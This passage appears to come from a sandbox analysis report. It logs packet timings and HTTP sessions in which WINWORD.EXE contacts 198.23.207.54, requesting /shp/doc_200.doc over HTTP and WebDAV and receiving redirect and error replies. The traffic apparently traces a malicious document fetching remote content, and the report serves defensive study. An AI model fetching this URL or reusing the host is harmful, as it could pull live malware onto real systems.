Aug 5, 2022 16:36:15.883162022 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883168936 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883187056 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883204937 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883213043 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883218050 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883219004 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883223057 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883225918 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883229017 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883232117 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883235931 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883246899 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883250952 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883260012 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883275986 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883301973 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883315086 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883318901 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883318901 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883322954 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883327007 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883330107 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883337021 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883364916 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883374929 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883380890 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883382082 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883384943 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883388996 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883393049 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883395910 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883409023 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883424997 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883428097 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883430958 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883438110 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883445024 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883460999 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883475065 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883477926 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883479118 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883496046 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883506060 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883512974 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883527994 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883531094 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883534908 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883548021 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.883553982 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883579969 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883584976 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883588076 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883645058 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.883651018 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.886440039 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.890564919 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.890594959 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.890609980 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.890625000 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.890681028 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.890696049 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.890711069 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.890769958 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.890782118 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.890785933 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.890808105 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.890811920 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.890889883 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.890906096 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.890947104 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.890954971 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.890973091 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.890988111 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.891016960 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.891036034 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.891041040 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.891062021 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.891082048 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.891084909 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.891088963 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.891091108 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.891098022 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.891113997 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.891132116 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.891136885 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.891145945 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.891159058 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.891175032 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.891179085 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.891181946 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.891184092 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.891185999 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.891254902 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.891258001 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.891259909 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.891318083 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.891324997 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.891904116 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.894119024 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.894184113 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.894200087 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.894205093 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.894270897 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.894346952 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.894387007 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.894417048 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.894468069 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.894534111 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.894628048 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.894699097 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.898713112 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.898727894 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.898806095 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.898905039 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:17.825645924 CEST	80	49173	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:17.825719118 CEST	49173	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:17.825762033 CEST	49173	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:17.940196037 CEST	80	49173	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:18.135864019 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:18.712316990 CEST	80	49174	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:18.713432074 CEST	49174	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:19.690480947 CEST	49176	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:19.805993080 CEST	80	49176	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:19.806138992 CEST	49176	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:19.806248903 CEST	49176	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:19.923563004 CEST	80	49176	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:19.923986912 CEST	49176	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:20.044523001 CEST	80	49176	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:20.256848097 CEST	49176	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:20.352402925 CEST	80	49176	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:20.352504015 CEST	49176	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:21.139225006 CEST	49176	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:21.255945921 CEST	80	49176	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:21.256493092 CEST	49176	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:21.375402927 CEST	80	49176	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:21.582988024 CEST	49176	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:21.680614948 CEST	80	49176	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:21.682591915 CEST	49176	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:26.883826017 CEST	80	49176	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:26.883884907 CEST	49176	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:26.883939981 CEST	49176	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:26.998274088 CEST	80	49176	198.23.207.54	192.168.2.22
Aug 5, 2022 16:37:24.798866987 CEST	49174	80	192.168.2.22	198.23.207.54

HTTP Request Dependency Graph

198.23.207.54

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49171	198.23.207.54	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 5, 2022 16:35:57.773119926 CEST	0	OUT	OPTIONS /shp/ HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: 198.23.207.54 Content-Length: 0 Connection: Keep-Alive
Aug 5, 2022 16:35:57.904737949 CEST	0	IN	HTTP/1.1 200 OK Date: Fri, 05 Aug 2022 14:35:57 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Allow: GET,POST,OPTIONS,HEAD,TRACE Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: httpd/unix-directory

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49172	198.23.207.54	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 5, 2022 16:36:03.946072102 CEST	1	OUT	HEAD /shp/doc_200.doc HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: 198.23.207.54
Aug 5, 2022 16:36:04.061631918 CEST	1	IN	HTTP/1.1 200 OK Date: Fri, 05 Aug 2022 14:36:03 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Last-Modified: Thu, 04 Aug 2022 12:13:37 GMT ETag: "6015-5e569478401c7" Accept-Ranges: bytes Content-Length: 24597 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49173	198.23.207.54	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 5, 2022 16:36:08.672837019 CEST	2	OUT	OPTIONS /shp HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: 198.23.207.54
Aug 5, 2022 16:36:08.788412094 CEST	2	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 05 Aug 2022 14:36:08 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Location: http://198.23.207.54/shp/ Content-Length: 336 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 39 38 2e 32 33 2e 32 30 37 2e 35 34 2f 73 68 70 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6e 20 50 48 50 2f 38 2e 31 2e 36 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 32 33 2e 32 30 37 2e 35 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://198.23.207.54/shp/">here</a>.</p><hr><address>Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Server at 198.23.207.54 Port 80</address></body></html>
Aug 5, 2022 16:36:08.789035082 CEST	2	OUT	OPTIONS /shp/ HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: 198.23.207.54
Aug 5, 2022 16:36:08.917889118 CEST	3	IN	HTTP/1.1 200 OK Date: Fri, 05 Aug 2022 14:36:08 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Allow: GET,POST,OPTIONS,HEAD,TRACE Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: httpd/unix-directory
Aug 5, 2022 16:36:09.228274107 CEST	3	IN	HTTP/1.1 200 OK Date: Fri, 05 Aug 2022 14:36:08 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Allow: GET,POST,OPTIONS,HEAD,TRACE Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: httpd/unix-directory
Aug 5, 2022 16:36:10.928634882 CEST	4	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 68 70 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 Data Ascii: PROPFIND /shp HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 198.23.207.54
Aug 5, 2022 16:36:11.044210911 CEST	4	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 05 Aug 2022 14:36:10 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Location: http://198.23.207.54/shp/ Content-Length: 336 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 39 38 2e 32 33 2e 32 30 37 2e 35 34 2f 73 68 70 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6e 20 50 48 50 2f 38 2e 31 2e 36 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 32 33 2e 32 30 37 2e 35 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://198.23.207.54/shp/">here</a>.</p><hr><address>Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Server at 198.23.207.54 Port 80</address></body></html>
Aug 5, 2022 16:36:11.044513941 CEST	4	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 68 70 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 Data Ascii: PROPFIND /shp/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 198.23.207.54
Aug 5, 2022 16:36:11.177066088 CEST	5	IN	HTTP/1.1 405 Method Not Allowed Date: Fri, 05 Aug 2022 14:36:11 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Allow: GET,POST,OPTIONS,HEAD,TRACE Content-Length: 328 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6e 20 50 48 50 2f 38 2e 31 2e 36 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 32 33 2e 32 30 37 2e 35 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Server at 198.23.207.54 Port 80</address></body></html>
Aug 5, 2022 16:36:11.477384090 CEST	6	IN	HTTP/1.1 405 Method Not Allowed Date: Fri, 05 Aug 2022 14:36:11 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Allow: GET,POST,OPTIONS,HEAD,TRACE Content-Length: 328 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6e 20 50 48 50 2f 38 2e 31 2e 36 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 32 33 2e 32 30 37 2e 35 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Server at 198.23.207.54 Port 80</address></body></html>
Aug 5, 2022 16:36:12.051573038 CEST	6	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 68 70 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 Data Ascii: PROPFIND /shp HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 198.23.207.54
Aug 5, 2022 16:36:12.167243958 CEST	7	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 05 Aug 2022 14:36:12 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Location: http://198.23.207.54/shp/ Content-Length: 336 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 39 38 2e 32 33 2e 32 30 37 2e 35 34 2f 73 68 70 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6e 20 50 48 50 2f 38 2e 31 2e 36 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 32 33 2e 32 30 37 2e 35 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://198.23.207.54/shp/">here</a>.</p><hr><address>Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Server at 198.23.207.54 Port 80</address></body></html>
